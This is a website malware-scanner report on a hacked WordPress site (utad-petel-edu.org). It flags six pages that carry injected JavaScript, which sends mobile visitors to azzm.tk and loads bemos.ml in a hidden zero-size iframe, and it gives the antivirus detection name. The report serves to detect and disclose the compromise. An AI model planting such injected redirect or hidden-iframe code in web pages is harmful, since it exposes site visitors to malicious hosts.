New scan:

Malware Scanner report for utad-petel-edu.org

Malicious/Suspicious/Total urls checked
6/0/16
6 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "utad-petel-edu.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=utad-petel-edu.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.utad-petel-edu.org/
200 OK
Content-Length: 23492
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){
window.location = "http://azzm.tk/?3";
}

Decoded script:


<iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe>

Antivirus reports:

NANO-Antivirus
Trojan.Script.IFrame.btdnqa

http://www.utad-petel-edu.org/wp-includes/js/jquery/jquery.js?ver=1.11.1
200 OK
Content-Length: 95807
Content-Type: application/javascript
clean
http://www.utad-petel-edu.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://www.utad-petel-edu.org/wp-content/plugins/gallery-plugin/fancybox/jquery.mousewheel-3.0.4.pack.js?ver=4.0.1
200 OK
Content-Length: 1279
Content-Type: application/javascript
clean
http://www.utad-petel-edu.org/wp-content/plugins/gallery-plugin/fancybox/jquery.fancybox-1.3.4.pack.js?ver=4.0.1
200 OK
Content-Length: 15624
Content-Type: application/javascript
clean
http://www.utad-petel-edu.org/wp-content/themes/utad/js/superfish.js?ver=1.0
200 OK
Content-Length: 3700
Content-Type: application/javascript
clean
http://www.utad-petel-edu.org/wp-content/themes/utad/js/custom.js?ver=1.0
200 OK
Content-Length: 18064
Content-Type: application/javascript
clean
http://www.utad-petel-edu.org/wp-content/themes/utad/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4
200 OK
Content-Length: 6684
Content-Type: application/javascript
clean
http://www.utad-petel-edu.org/wp-content/themes/utad/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4
200 OK
Content-Length: 16083
Content-Type: application/javascript
clean
http://www.utad-petel-edu.org/wp-content/themes/utad/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1
200 OK
Content-Length: 6423
Content-Type: application/javascript
clean
http://www.utad-petel-edu.org/organigramme
200 OK
Content-Length: 19930
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){
window.location = "http://azzm.tk/?3";
}

Decoded script:


<iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe>

Antivirus reports:

NANO-Antivirus
Trojan.Script.IFrame.btdnqa

http://www.utad-petel-edu.org/formations-academiques/administration-des-affaires
200 OK
Content-Length: 23207
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){
window.location = "http://azzm.tk/?3";
}

Decoded script:


<iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe>

Antivirus reports:

NANO-Antivirus
Trojan.Script.IFrame.btdnqa

http://www.utad-petel-edu.org/formations-academiques/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 06 Mar 2015 11:02:13 GMT
Location: http://www.utad-petel-edu.org/formations-academiques
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.utad-petel-edu.org/xmlrpc.php
X-Powered-By: PHP/5.4.37
clean
http://www.utad-petel-edu.org/formations-academiques
200 OK
Content-Length: 19465
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){
window.location = "http://azzm.tk/?3";
}

Decoded script:


<iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe>

Antivirus reports:

NANO-Antivirus
Trojan.Script.IFrame.btdnqa

http://www.utad-petel-edu.org/formations-academiques/miage
200 OK
Content-Length: 25234
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){
window.location = "http://azzm.tk/?3";
}

Decoded script:


<iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe>

Antivirus reports:

NANO-Antivirus
Trojan.Script.IFrame.btdnqa

http://www.utad-petel-edu.org/formations-academiques/mines-et-geologie
200 OK
Content-Length: 29157
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|iphone|ipad)/i)!==null){
window.location = "http://azzm.tk/?3";
}

Decoded script:


<iframe src="http://bemos.ml/?1" width="0" height="0" align="left"></iframe>

Antivirus reports:

NANO-Antivirus
Trojan.Script.IFrame.btdnqa


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: utad-petel-edu.org

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: utad-petel-edu.org
Referer: http://www.google.com/search?q=utad-petel-edu.org

Result:
The result is similar to the first query. There are no suspicious redirects found.